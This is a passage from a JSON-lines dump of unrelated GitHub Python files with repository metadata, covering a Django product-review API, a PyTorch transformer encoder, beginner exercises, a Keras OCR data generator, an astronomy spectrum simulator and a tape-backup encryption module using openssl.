None)\n\t\tmember_id = request.GET.get('member_id', None)\n\t\tresponse = create_response(500)\n\t\tif not owner_id or not member_id:\n\t\t\tresponse.errMsg = u'参数错误'\n\t\t\treturn response.get_response()\n\t\tevaluates = apps_models.ProductEvaluates.objects(owner_id=int(owner_id), member_id=int(member_id))\n\t\torder_id2id = _get_order_id_to_id(evaluates)\n\t\torder_id2evaluiates = dict()\n\t\torder_id2status = dict()\n\t\tfor evaluate in evaluates:\n\t\t\torder_id = order_id2id.get(evaluate.order_id, 0)\n\t\t\torder_status = order_id2status.get(order_id, True)\n\t\t\thas_reviewed = False\n\t\t\tif isinstance(evaluate.detail, dict):\n\t\t\t\tfor k, v in evaluate.detail.items():\n\t\t\t\t\tif (k.find('qa') >= 0 and v) or (k.find('selection') >= 0 and v):\n\t\t\t\t\t\thas_reviewed = True\n\t\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\thas_reviewed = True\n\t\t\ttemp_dict = {\n\t\t\t\t'product_id': evaluate.product_id,\n\t\t\t\t'order_has_product_id': evaluate.order_has_product_id,\n\t\t\t\t'has_reviewed_picture': len(evaluate.pics) > 0,\n\t\t\t\t'has_reviewed': has_reviewed\n\t\t\t}\n\t\t\tif not order_id2evaluiates.has_key(order_id):\n\t\t\t\torder_id2evaluiates[order_id] = [temp_dict]\n\t\t\telse:\n\t\t\t\torder_id2evaluiates[order_id].append(temp_dict)\n\n\t\t\torder_id2status[order_id] = order_status and len(evaluate.pics) > 0 and has_reviewed\n\t\torders = []\n\t\tfor k, v in order_id2evaluiates.items():\n\t\t\torders.append({\n\t\t\t\t'order_id': k,\n\t\t\t\t'order_is_reviewed': order_id2status.get(k, True),\n\t\t\t\t'order_product': v\n\t\t\t})\n\t\tresponse = create_response(200)\n\t\tresponse.data = {'orders': orders}\n\t\treturn response.get_response()\n\nclass GetProductEvaluates(resource.Resource):\n\tapp = 'apps/evaluate'\n\tresource = 'get_product_evaluates'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\t商品详情-两条评价信息\n\t\t@params woid, product_id\n\t\t@return {\n\t\t\t'product_reviews': [{\n\t\t\t\t'status': 2,\n\t\t\t\t'member_icon': '',\n\t\t\t\t'created_at': '2016-06-06 10:32:10',\n\t\t\t\t'member_id': 1,\n\t\t\t\t'review_detail': '',\n\t\t\t\t'member_name': 'bill'\n\t\t\t}],\n\t\t\t'has_more': True\n\t\t}\n\t\t\"\"\"\n\t\towner_id = request.GET.get('woid', None)\n\t\tproduct_id = request.GET.get('product_id', None)\n\t\tresponse = create_response(500)\n\t\tif not owner_id or not product_id:\n\t\t\tresponse.errMsg = u'参数错误'\n\t\t\treturn response.get_response()\n\n\t\t#需要考虑到评价相关联的商品\n\t\towner_id=int(owner_id)\n\t\tproduct_id = int(product_id)\n\t\trelations = apps_models.EvaluatesRelatedProducts.objects(owner_id=owner_id, product_id=product_id)\n\t\tif relations.count() > 0:\n\t\t\tproduct_ids = apps_models.EvaluatesRelations.objects(id=relations.first().belong_to).first().related_product_ids\n\t\telse:\n\t\t\tproduct_ids = [product_id]\n\n\t\tevaluates = apps_models.ProductEvaluates.objects(owner_id=owner_id, product_id__in=product_ids, status__in=[apps_models.STATUS_PASSED, apps_models.STATUS_TOP]).order_by('-top_time', '-created_at')\n\t\tmember_ids = [e.member_id for e in evaluates]\n\t\tmember_id2info = {m.id: {'icon': m.user_icon, 'name': m.username_for_title} for m in Member.objects.filter(id__in=member_ids)}\n\t\tresult = []\n\t\tcount = 0\n\t\tfor evaluate in evaluates:\n\t\t\tcount += 1\n\t\t\tmember_id = evaluate.member_id\n\t\t\tdetail = evaluate.detail\n\t\t\ttemp_detail = []\n\t\t\tif isinstance(detail, dict):\n\t\t\t\tfor k, v in sorted(detail.items()):\n\t\t\t\t\tif (k.find('qa') >= 0 and v) or (k.find('selection') >= 0 and v):\n\t\t\t\t\t\ttemp_detail.append(v.split('::')[1])\n\t\t\t\ttemp_detail = u';'.join(temp_detail)\n\t\t\telse:\n\t\t\t\ttemp_detail = detail\n\n\t\t\tresult.append({\n\t\t\t\t'status': evaluate.status,\n\t\t\t\t'member_icon': member_id2info[member_id]['icon'],\n\t\t\t\t'created_at': evaluate.created_at.strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t'member_id': member_id,\n\t\t\t\t'review_detail': temp_detail,\n\t\t\t\t'member_name': member_id2info[member_id]['name']\n\t\t\t})\n\t\t\tif count >= 2:\n\t\t\t\tbreak\n\t\tresponse = create_response(200)\n\t\tresponse.data = {\n\t\t\t'product_reviews': result,\n\t\t\t'has_more': evaluates.count() > 2\n\t\t}\n\t\treturn response.get_response()\n\nclass GetUnreviewdCount(resource.Resource):\n\tapp = 'apps/evaluate'\n\tresource = 'get_unreviewd_count'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\t个人中心-待评价(获取待评价的个数) 当前会员所有未晒图的产品\n\t\t@param\torder_has_product_list_ids\n\t\t@return: {\n\t\t\t\t\"reviewed_count\": int\n\t\t\t}\n\t\t\"\"\"\n\t\tresponse = create_response(500)\n\t\torder_has_product_list_ids = request.GET.get('order_has_product_list_ids', None)\n\t\tif not order_has_product_list_ids:\n\t\t\tresponse.errMsg = u'缺少参数'\n\t\t\treturn response.get_response()\n\t\torder_has_product_list_ids = map(lambda x: int(x), order_has_product_list_ids.split('_'))\n\t\ttry:\n\t\t\tcount = apps_models.ProductEvaluates.objects(order_has_product_id__in=order_has_product_list_ids, pics__ne=[]).count()\n\t\t\tresponse = create_response(200)\n\t\t\tresponse.data = {\n\t\t\t\t\"reviewed_count\": count\n\t\t\t}\n\t\t\treturn response.get_response()\n\t\texcept:\n\t\t\tresponse.errMsg = u'查询失败'\n\t\t\treturn response.get_response()\n\nclass GetOrderEvaluatesStatus(resource.Resource):\n\n\tapp = 'apps/evaluate'\n\tresource = 'get_order_evaluates'\n\n\tdef api_get(request):\n\t\t\"\"\"\n\t\t个人中心-全部订单,获取订单的评价状态\n\t\t@param woid, member_id\n\t\t@return: {\n\t \"orders\": [\n\t {'order_id':6789,\n\t 'order_is_reviewed':True,\n\t }]\n\t }\n\t\t\"\"\"\n\t\towner_id = request.GET.get('woid', None)\n\t\tmember_id = request.GET.get('member_id', None)\n\t\tresponse = create_response(500)\n\t\tif not owner_id or not member_id:\n\t\t\tresponse.errMsg = u'参数错误'\n\t\t\treturn response.get_response()\n\t\torder_evas = apps_models.OrderEvaluates.objects(owner_id=int(owner_id), member_id=int(member_id))\n\t\torder_id2id = _get_order_id_to_id(order_evas)\n\t\tresponse = create_response(200)\n\t\tresponse.data = {'orders': [{'order_id': order_id2id.get(o.order_id, 0), 'order_is_reviewed': True} for o in order_evas]}\n\t\treturn response.get_response()","repo_name":"chengdg/weizoom","sub_path":"weapp/apps/customerized_apps/evaluate/remote_call.py","file_name":"remote_call.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6285090067","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom src.tools import activation_factory, initialization_factory\nfrom src.models.common.DropPathLayer import DropPath\nimport numpy as np\n\nfrom IPython import embed; from sys import exit\n\nclass Encoder(nn.Module):\n\n def __init__(\n self, \n in_channels, \n num_hid, \n num_head, \n num_feed_forward, \n num_layers, \n dropout=0.0, \n learn_pos_enc=False, \n max_seq_len=None,\n seq_emb_activation='relu',\n seq_emb_init='he',\n seq_emb_learn_nan_emb=False,\n tformer_activation='relu',\n tformer_init='he',\n tformer_mha_dropout=0.0,\n tformer_ffn_dropout=0.0,\n tformer_first_drop_path=0.0,\n tformer_second_drop_path=0.0\n ):\n super().__init__()\n self.num_hid = num_hid\n self.learn_pos_enc = learn_pos_enc\n self.seq_emb = SeqEmbedding(\n in_channels=in_channels, \n num_hid=num_hid, \n max_seq_len=max_seq_len\n )\n self.encoder = nn.ModuleList(\n [TransformerEncoder(\n embed_dim=num_hid, \n num_heads=num_head, \n feed_forward_dim=num_feed_forward, \n rate=dropout,\n activation=tformer_activation,\n init=tformer_init,\n mha_dropout=tformer_mha_dropout,\n ffn_dropout=tformer_ffn_dropout,\n first_drop_path=tformer_first_drop_path,\n second_drop_path=tformer_second_drop_path\n ) for _ in range(num_layers)]\n )\n\n def forward(self, seq, seq_mask):\n # seq = (batch, seq_len, features)\n seq = self.seq_emb(seq)\n\n for l in self.encoder:\n seq = l(seq, seq_mask)\n\n return seq\n \n\nclass SeqEmbedding(nn.Module):\n\n def __init__(self, in_channels, num_hid, max_seq_len):\n super().__init__()\n linear1 = nn.Linear(in_features=in_channels, out_features=num_hid, bias=False)\n linear2 = nn.Linear(in_features=num_hid, out_features=num_hid, bias=False)\n\n self.emb = nn.Sequential(\n linear1,\n nn.GELU(),\n linear2\n )\n self.nan_emb = nn.parameter.Parameter(\n data=torch.zeros((num_hid), dtype=torch.float32),\n requires_grad=True\n )\n self.pos_emb = nn.parameter.Parameter(\n data=torch.zeros((max_seq_len, num_hid), dtype=torch.float32),\n requires_grad=True\n )\n\n fan = torch.nn.init._calculate_correct_fan(self.emb[2].weight, mode='fan_in')\n bound = np.sqrt(6 / fan)\n with torch.no_grad():\n torch.nn.init.xavier_uniform_(self.emb[0].weight)\n torch.nn.init.uniform_(self.emb[2].weight, a=-bound, b=bound)\n\n def forward(self, seq):\n seq = torch.where(\n # Checks whether landmark is missing in frame\n seq.sum(2, keepdims=True) == 0,\n # If so, the empty embedding is used\n self.nan_emb,\n # Otherwise the landmark data is embedded\n self.emb(seq),\n )\n seq = seq + self.pos_emb\n return seq\n\nclass MultiHeadAttention(nn.Module):\n\n def __init__(self, d_model, num_of_heads, dropout):\n super().__init__()\n depth = d_model // num_of_heads\n self.num_of_heads = num_of_heads\n self.wq = torch.nn.ModuleList([torch.nn.Linear(in_features=d_model, out_features=depth//2, bias=False) for _ in range(num_of_heads)])\n self.wk = torch.nn.ModuleList([torch.nn.Linear(in_features=d_model, out_features=depth//2, bias=False) for _ in range(num_of_heads)])\n self.wv = torch.nn.ModuleList([torch.nn.Linear(in_features=d_model, out_features=depth//2, bias=False) for _ in range(num_of_heads)])\n self.wo = torch.nn.Linear(in_features=(depth//2)*self.num_of_heads, out_features=d_model, bias=False)\n self.do = nn.Dropout(dropout)\n self.register_buffer(name='scale', tensor=torch.sqrt(torch.FloatTensor([depth])))\n\n with torch.no_grad():\n for i in range(num_of_heads):\n torch.nn.init.xavier_uniform_(self.wq[i].weight)\n torch.nn.init.xavier_uniform_(self.wk[i].weight)\n torch.nn.init.xavier_uniform_(self.wv[i].weight)\n torch.nn.init.xavier_uniform_(self.wo.weight)\n\n def scaled_dot_product(self, q, k, v, attention_mask):\n qkt = torch.matmul(q,k.permute(0,2,1))\n scaled_qkt = qkt/self.scale\n scaled_qkt = scaled_qkt.masked_fill(attention_mask, -1e10)\n scaled_qkt = F.softmax(scaled_qkt, dim=-1)\n z = torch.matmul(scaled_qkt, v)\n return z\n\n def forward(self, q, k, v, attention_mask=None):\n multi_attn = []\n for i in range(self.num_of_heads):\n Q = self.wq[i](q)\n K = self.wk[i](k)\n V = self.wv[i](v)\n multi_attn.append(self.scaled_dot_product(Q,K,V,attention_mask))\n multi_head = torch.cat(multi_attn, axis=-1)\n multi_head_attention = self.wo(multi_head)\n multi_head_attention = self.do(multi_head_attention)\n\n return multi_head_attention\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self,embed_dim, num_heads, feed_forward_dim, rate=0.1, activation='relu', init='he', mha_dropout=0.0, ffn_dropout=0.0, first_drop_path=0.0, second_drop_path=0.0):\n super().__init__()\n self.lnorm1 = nn.LayerNorm(normalized_shape=embed_dim, eps=1e-6)\n self.attn = MultiHeadAttention(embed_dim, num_heads, mha_dropout)\n self.lnorm2 = nn.LayerNorm(normalized_shape=embed_dim, eps=1e-6)\n\n linear1 = nn.Linear(in_features=embed_dim, out_features=feed_forward_dim, bias=False)\n linear2 = nn.Linear(in_features=feed_forward_dim, out_features=embed_dim, bias=False)\n\n self.ffn = nn.Sequential(\n linear1,\n nn.GELU(),\n nn.Dropout(ffn_dropout),\n linear2,\n )\n\n fan = torch.nn.init._calculate_correct_fan(self.ffn[3].weight, mode='fan_in')\n bound = np.sqrt(6 / fan)\n with torch.no_grad():\n torch.nn.init.xavier_uniform_(self.ffn[0].weight)\n torch.nn.init.uniform_(self.ffn[3].weight, a=-bound, b=bound)\n\n def forward(self, seq, seq_mask):\n # seq = (batch, num_hid, len)\n # seq = (batch, len, num_hid)\n seq = self.lnorm1(seq + self.attn(seq,seq,seq,seq_mask))\n seq = self.lnorm2(seq + self.ffn(seq))\n\n return seq","repo_name":"joshuasv/SLFR-examples","sub_path":"src/models/encoders/MARK.py","file_name":"MARK.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33789285590","text":"def mostralinha():\n print('-'*50)\ndef bemvindo():\n print('Seja bem vindo!')\n print(\"Espero que goste.\")\n\nmostralinha()\nbemvindo()\nmostralinha()\n\ndef cadastrar(nome):\n print(nome,'foi cadastrado')\n\n\ncadastrar('davi')\ncadastrar('vida')\ncadastrar('iavd')\nmostralinha()\ndef operacoes(n1,n2):\n print('soma',n1+n2)\n print('Subração =',n1-n2)\n print('Multiplicação',n1*n2)\n print('Divisão',n1/n2)\n\n\noperacoes(6,8)\n\nmostralinha()\nprint(len('davi'))\nmostralinha()\ndef triplo(num):\n return num * 3\n\ntotal = triplo(3) * triplo(3)\nprint(total)\nmostralinha()\n\ndef rendimento(deposito,taxa):\n for x in range(24):\n deposito +=deposito*taxa/100\n return deposito\n\nprint(rendimento(500,0.5))\n\ndef mul(n1,n2):\n return n1*n2\nmostralinha()\nprint(mul(5,5))\nmostralinha()\ndef modulo(num):\n if num>=0:\n return num\n else:\n return num *-1\n\nprint(modulo(-9))","repo_name":"davigledson/Programacao-Estruturada-e-Orientada-a-Objetos","sub_path":"Programação Estruturada/aula008-revisao-para-att/ex001.py","file_name":"ex001.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14343178834","text":"\"\"\"\n请实现一个函数,输入一个整数,输出该数二进制表示中1的个数。\n例如,把9表示成二进制是1001,有2位是1。因此,如果输入9,则\n该函数输出2。\n\"\"\"\n\nclass Solution(object):\n def binary_count(self, n):\n counter = 0\n if n<0:\n n = ~n + 1\n while n > 1:\n m = n % 2\n counter += m\n n = n // 2\n counter += n\n return counter\n\nclass Solution1(object):\n def binary_count(self, n):\n counter = 0\n flag = 1\n while flag < (1 << 31):\n if n & flag:\n counter += 1\n flag = (flag << 1)\n return counter\n\nif __name__ == '__main__':\n s1 = Solution1()\n s = Solution()\n print(s1.binary_count(n=-16666))\n print(s.binary_count(n=-16666))","repo_name":"yuyaxiong/interveiw_algorithm","sub_path":"剑指offer/二进制中1的个数.py","file_name":"二进制中1的个数.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70840494953","text":"import keras.callbacks\nimport numpy as np\nfrom src.handwritten_text_recognition.file_manager.file_loader import FileLoader\nimport src.handwritten_text_recognition.ocr.text_preprocessing as text_preprocessing\n\n\nclass DataGenerator(keras.callbacks.Callback):\n def __init__(self, downsample_factor=2 ** 2, line_width_padded=535,\n line_height_normalized=64, max_string_length=7):\n super().__init__()\n\n self.downsample_factor = downsample_factor\n\n self.line_height_normalized = line_height_normalized\n self.line_width_padded = line_width_padded\n self.max_string_length = max_string_length\n\n self.image_paths = None\n self.image_labels = None\n\n self.batch_size = None\n self.validation_split = None\n self.number_of_training_data = None\n self.number_of_validation_data = None\n self.number_of_validation_split = None\n\n self.current_train_index = None\n self.current_val_index = None\n\n def setup_training(self, image_paths, image_labels, batch_size=32, validation_split=0.2):\n assert len(image_paths) == len(image_labels)\n\n self.image_paths = image_paths\n self.image_labels = image_labels\n\n self.batch_size = batch_size\n\n self.validation_split = validation_split\n self.number_of_training_data = len(image_paths)\n self.number_of_validation_data = int(self.number_of_training_data * validation_split)\n self.number_of_validation_split = self.number_of_training_data - self.number_of_validation_data\n\n self.current_train_index = 0\n self.current_val_index = self.number_of_validation_split\n\n def generate_training(self):\n while 1:\n batch_output = self._get_batch_for_training()\n\n self.current_train_index += self.batch_size\n if self.current_train_index >= self.number_of_validation_split:\n self.current_train_index = self.current_train_index % 32 # probably self.batch_size\n self.image_paths, self.image_labels = self._shuffle_data(self.image_paths, self.image_labels)\n\n yield batch_output\n\n def generate_validation(self):\n while 1:\n batch_output = self._get_batch_for_training()\n\n self.current_val_index += self.batch_size\n if self.current_val_index >= self.number_of_training_data:\n self.current_val_index = self.number_of_validation_split + self.current_val_index % 32\n # set index back to the validation split starting value\n\n yield batch_output\n\n def generate_prediction(self, image, batch_size=1):\n while 1:\n batch_output = self._get_batch_for_prediction(image, batch_size)\n network_input = batch_output[0]\n yield batch_output\n\n def get_steps_per_epoch(self):\n return (self.number_of_training_data - self.number_of_validation_data) // self.batch_size\n\n def get_validation_steps(self):\n return self.number_of_validation_data // self.batch_size\n\n def on_train_begin(self, logs=None):\n print(\"On train begin...\")\n self._shuffle_data(self.image_paths, self.image_labels)\n\n def _get_batch_for_training(self):\n batch_images, batch_labels, input_length, label_length = self._bootstrap_model_input(batch_size=self.batch_size)\n\n target_strings = []\n for i in range(self.batch_size):\n image_path = self.image_paths[self.current_train_index + i]\n image_label = self.image_labels[self.current_train_index + i]\n\n target_strings.append(image_label)\n\n image_train = self._get_image(image_path)\n x_train_image = text_preprocessing.process_image(image_train, self.line_height_normalized)\n x_train_image = text_preprocessing.pad_sequence(x_train_image, self.line_height_normalized,\n self.line_width_padded)\n y_train_label = self._process_label(image_label)\n\n single_label_length = len(image_label)\n single_label_length = np.array([single_label_length])\n\n batch_images[i, 0:self.line_width_padded, :, 0] = x_train_image\n batch_labels[i, 0:len(image_label)] = y_train_label\n input_length[i] = self.line_width_padded // self.downsample_factor - 2\n # -2 as the first couple outputs of the RNN tend to be garbage\n label_length[i] = single_label_length\n\n inputs = {'input': batch_images,\n 'labels': batch_labels,\n 'input_length': input_length,\n 'label_length': label_length,\n 'target_strings': target_strings\n }\n outputs = {'ctc': np.zeros([self.batch_size])} # dummy data for dummy loss function\n return inputs, outputs\n\n def _get_batch_for_prediction(self, image, batch_size):\n batch_images, batch_labels, input_length, label_length = self._bootstrap_model_input(batch_size=batch_size)\n\n for i in range(batch_size):\n image_label = '42'\n\n x_image = text_preprocessing.process_image(image, self.line_height_normalized)\n x_image = text_preprocessing.pad_sequence(x_image, self.line_height_normalized,\n self.line_width_padded)\n\n y_label = self._process_label(image_label)\n\n single_label_length = len(image_label)\n single_label_length = np.array([single_label_length])\n\n batch_images[i, 0:self.line_width_padded, :, 0] = x_image\n batch_labels[i, 0:len(image_label)] = y_label\n input_length[i] = self.line_width_padded // self.downsample_factor - 2\n # -2 as the first couple outputs of the RNN tend to be garbage\n label_length[i] = single_label_length\n\n inputs = {'input': batch_images,\n 'labels': batch_labels,\n 'input_length': input_length,\n 'label_length': label_length\n }\n outputs = {'ctc': np.zeros([batch_size])} # dummy data for dummy loss function\n return inputs, outputs\n\n def _bootstrap_model_input(self, batch_size):\n batch_images = np.ones([batch_size, self.line_width_padded, self.line_height_normalized, 1])\n batch_labels = np.ones([batch_size, self.max_string_length]) * -1\n input_length = np.zeros([batch_size, 1])\n label_length = np.zeros([batch_size, 1])\n\n return batch_images, batch_labels, input_length, label_length\n\n def _process_label(self, image_label):\n ret = []\n lower_case_offset = 26\n upper_case_offset = 26\n number_offset = 10\n\n try:\n for char in image_label:\n if char >= 'a' and char <= 'z':\n ret.append(ord(char) - ord('a')) # lowercase letters go from 0 to 25\n elif char >= 'A' and char <= 'Z':\n ret.append(ord(char) - ord('A') + lower_case_offset)\n elif char in '0123456789':\n ret.append(ord(char) - ord('0') + lower_case_offset + upper_case_offset)\n elif char == ' ':\n ret.append(number_offset + lower_case_offset + upper_case_offset)\n elif char == ',':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 1)\n elif char == '.':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 2)\n elif char == '-':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 3)\n elif char == '/':\n ret.append(number_offset + lower_case_offset + upper_case_offset + 4)\n else:\n '''All other possible characters are also recognised as '/' for now\n we will have to change the model to fit in more characters, also,\n other characters are all too rare in training data for now.'''\n ret.append(number_offset + lower_case_offset + upper_case_offset + 4)\n return np.array(ret)\n except Exception:\n ret.append(number_offset + lower_case_offset + upper_case_offset + 4)\n return np.array(ret)\n\n def _shuffle_data(self, x_data, y_data, stop_index=None):\n data_length = len(self.image_paths)\n if stop_index is None:\n stop_index = data_length\n assert stop_index <= data_length\n\n a = list(range(stop_index))\n np.random.shuffle(a)\n a += list(range(stop_index, data_length)) # add unshuffled validation indices\n\n if isinstance(x_data, np.ndarray):\n x_data = x_data[a]\n elif isinstance(x_data, list):\n x_data = [x_data[i] for i in a]\n\n if isinstance(y_data, np.ndarray):\n y_data = y_data[a]\n elif isinstance(y_data, list):\n y_data = [y_data[i] for i in a]\n\n return x_data, y_data\n\n def _get_image(self, image_path):\n image_container = FileLoader.load_image(image_path)\n return image_container.get_unprocessed_image()\n","repo_name":"CrazyCrud/ocr-with-keras","sub_path":"src/handwritten_text_recognition/ocr/train/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18089235085","text":"from typing import List\n\ndef convert_classes_to_table(classes: list, attributes_to_print: List[str]):\n if len(classes) == 0:\n return classes\n\n table = []\n table.append(attributes_to_print)\n for class_ in classes:\n row = []\n for attribute_path in attributes_to_print:\n attribute = class_\n for attribute_key in attribute_path.split(\".\"):\n if not hasattr(attribute, attribute_key):\n raise AttributeError(f\"'{class_}' does not have the attribute '{attribute_path}'\")\n attribute = getattr(attribute, attribute_key)\n row.append(str(attribute))\n table.append(row)\n return table\n","repo_name":"Xerner/python-class-query","sub_path":"clsquery/convert_classes_to_table.py","file_name":"convert_classes_to_table.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43739294312","text":"__author__ = 'Vince.ec'\n\nfrom grizli import model\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom astropy.table import Table\nfrom astropy import wcs\nfrom astropy.io import fits\nfrom glob import glob\nimport os\n\ndef Extract_BeamCutout(target_id, grism_file, mosaic, seg_map, instruement, catalog):\n flt = model.GrismFLT(grism_file = grism_file ,\n ref_file = mosaic, seg_file = seg_map,\n pad=200, ref_ext=0, shrink_segimage=True, force_grism = instrument)\n \n # catalog / semetation image\n ref_cat = Table.read(catalog ,format='ascii')\n seg_cat = flt.blot_catalog(ref_cat,sextractor=False)\n flt.compute_full_model(ids=seg_cat['id'])\n beam = flt.object_dispersers[target_id][2]['A']\n co = model.BeamCutout(flt, beam, conf=flt.conf)\n \n PA = np.round(fits.open(grism_file)[0].header['PA_V3'] , 1)\n \n co.write_fits(root='beams/o{0}'.format(PA), clobber=True)\n\n ### add EXPTIME to extension 0\n \n \n fits.setval('beams/o{0}_{1}.{2}.A.fits'.format(PA, target_id, instrument), 'EXPTIME', ext=0,\n value=fits.open('beams/o{0}_{1}.{2}.A.fits'.format(PA, target_id, instrument))[1].header['EXPTIME']) \n\ndef Scale_model(data, sigma, model):\n return np.sum(((data * model) / sigma ** 2)) / np.sum((model ** 2 / sigma ** 2))\n\n\nclass Gen_spec(object):\n def __init__(self, beam, redshift,gal_wv, gal_fl, gal_er, minwv = 7800, maxwv = 11200):\n self.beam = model.BeamCutout(fits_file = beam)\n self.redshift = redshift\n self.gal_wv = gal_wv \n self.gal_fl = gal_fl\n self.gal_er = gal_er\n \"\"\" \n\n\n \"\"\"\n\n IDX = [U for U in range(len(self.gal_wv)) if minwv <= self.gal_wv[U] <= maxwv]\n\n self.gal_wv_rf = gal_wv[IDX] / (1 + self.redshift)\n self.gal_wv = gal_wv[IDX]\n self.gal_fl = gal_fl[IDX]\n self.gal_er = gal_er[IDX]\n\n ## Get sensitivity function\n flat = self.beam.flat_flam.reshape(self.beam.beam.sh_beam)\n fwv, ffl, e = self.beam.beam.optimal_extract(flat, bin=0)\n \n self.filt = interp1d(fwv, ffl)(self.gal_wv)\n \n def Sim_spec(self, model_wv, model_fl, model_redshift = 0, dust = 0):\n if model_redshift ==0:\n model_redshift = self.redshift \n \n ## Compute the models\n self.beam.compute_model(spectrum_1d=[model_wv*(1+model_redshift),model_fl])\n\n ## Extractions the model (error array here is meaningless)\n w, f, e = self.beam.beam.optimal_extract(self.beam.model , bin=0)\n\n ifl = interp1d(w, f)(self.gal_wv)\n \n C = Scale_model(self.gal_fl, self.gal_er, ifl / self.filt)\n\n self.fl = C * ifl / self.filt","repo_name":"Vince-ec/grizli_sim_tutorial","sub_path":"sim_tools.py","file_name":"sim_tools.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17477399872","text":"import logging\nimport datetime\nimport subprocess\nimport os\nimport sys\nimport time\nimport threading\nfrom lib import database\nfrom pathlib import Path\n\nlogger = logging.getLogger()\n\n\nclass Encryption:\n def __init__(self, config, engine, tapelibrary, tools, local=False):\n self.config = config\n self.engine = engine\n self.session = database.create_session(engine)\n self.tapelibrary = tapelibrary\n self.tools = tools\n self.local_files = local\n self.interrupted = False\n self.active_threads = []\n\n def set_interrupted(self):\n self.interrupted = True\n\n def encrypt_single_file_thread(self, threadnr, id, filepath, filename_enc):\n thread_session = database.create_session(self.engine)\n file = database.update_filename_enc(thread_session, id, filename_enc)\n\n time_started = time.time()\n\n if not self.local_files:\n command = ['openssl', 'enc', '-aes-256-cbc', '-pbkdf2', '-iter', '100000', '-in',\n os.path.abspath(f\"{self.config['local-data-dir']}/{filepath}\"), '-out',\n os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"), '-k',\n self.config['enc-key']]\n else:\n command = ['openssl', 'enc', '-aes-256-cbc', '-pbkdf2', '-iter', '100000', '-in',\n os.path.abspath(f\"{self.config['local-base-dir']}/{filepath}\"), '-out',\n os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"), '-k',\n self.config['enc-key']]\n openssl = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=os.setpgrp)\n\n if openssl.returncode == 0:\n logger.debug(f\"Execution Time: Encrypt file with openssl: {time.time() - time_started} seconds\")\n\n time_started = time.time()\n md5 = self.tools.md5sum(os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"))\n logger.debug(f\"Execution Time: md5sum encrypted file: {time.time() - time_started} seconds\")\n\n filesize = os.path.getsize(os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"))\n encrypted_date = datetime.datetime.now()\n database.update_file_after_encrypt(thread_session, file, filesize, encrypted_date, md5)\n\n if not self.local_files:\n time_started = time.time()\n os.remove(os.path.abspath(f\"{self.config['local-data-dir']}/{filepath}\"))\n logger.debug(f\"Execution Time: Remove file after encryption: {time.time() - time_started} seconds\")\n else:\n logger.warning(f\"encrypt file failed, file: {id} error: {openssl.stderr}\")\n logger.debug(f\"Execution Time: Encrypt file with openssl: {time.time() - time_started} seconds\")\n\n self.active_threads.remove(threadnr)\n thread_session.close()\n\n def encrypt(self):\n logger.info(\"Starting encrypt files job\")\n\n while True:\n files = database.get_files_to_be_encrypted(self.session)\n\n if len(files) == 0:\n break\n\n file_count_total = len(files)\n file_count_current = 0\n\n for file in files:\n file_count_current += 1\n for i in range(0, self.config['threads']['encrypt']):\n if i not in self.active_threads:\n next_thread = i\n break\n\n logger.info(f\"Starting Thread #{next_thread}, processing ({file_count_current}/{file_count_total}): \"\n f\"id: {file.id}, filename: {file.filename}\")\n\n filename_enc = self.tools.create_filename_encrypted()\n while database.filename_encrypted_already_used(self.session, filename_enc):\n logger.warning(f\"Filename ({filename_enc}) encrypted already exists, creating new one!\")\n filename_enc = self.tools.create_filename_encrypted()\n\n self.active_threads.append(next_thread)\n x = threading.Thread(target=self.encrypt_single_file_thread,\n args=(next_thread, file.id, file.path, filename_enc,),\n daemon=True)\n x.start()\n\n while threading.active_count() > self.config['threads']['encrypt']:\n time.sleep(0.2)\n\n if self.interrupted:\n while threading.active_count() > 1:\n time.sleep(1)\n break\n\n if self.interrupted:\n while threading.active_count() > 1:\n time.sleep(1)\n break\n\n ## Multithreading fix: Wait for all threads to finish, otherwise one file get encrypted twice!\n while threading.active_count() > 1:\n time.sleep(1)\n\n # src relative to tape, dst relative to restore-dir\n def decrypt_relative(self, src, dst, mkdir=False):\n if 'restore-dir' not in self.config:\n logging.error('\"restore-dir\" not configured')\n sys.exit(1)\n restore_dir = Path(self.config['restore-dir'])\n\n if not restore_dir.is_dir():\n logging.error(f'restore directory \"{restore_dir}\" does not exist or is not a directory')\n sys.exit(1)\n\n src_path = Path(self.config['local-tape-mount-dir']) / src\n dst_path = restore_dir / dst\n\n if mkdir:\n dst_path.parent.mkdir(parents=True, exist_ok=True)\n\n return self.decrypt(src_path.resolve(), dst_path.resolve())\n\n def decrypt(self, src, dst):\n if not isinstance(dst, Path):\n dst = Path(dst)\n if dst.is_file():\n logger.error(f'File {dst} already exists, skipping decrypt')\n return True\n\n openssl = [\n 'openssl', 'enc', '-d', '-aes-256-cbc', '-pbkdf2', '-iter', '100000',\n 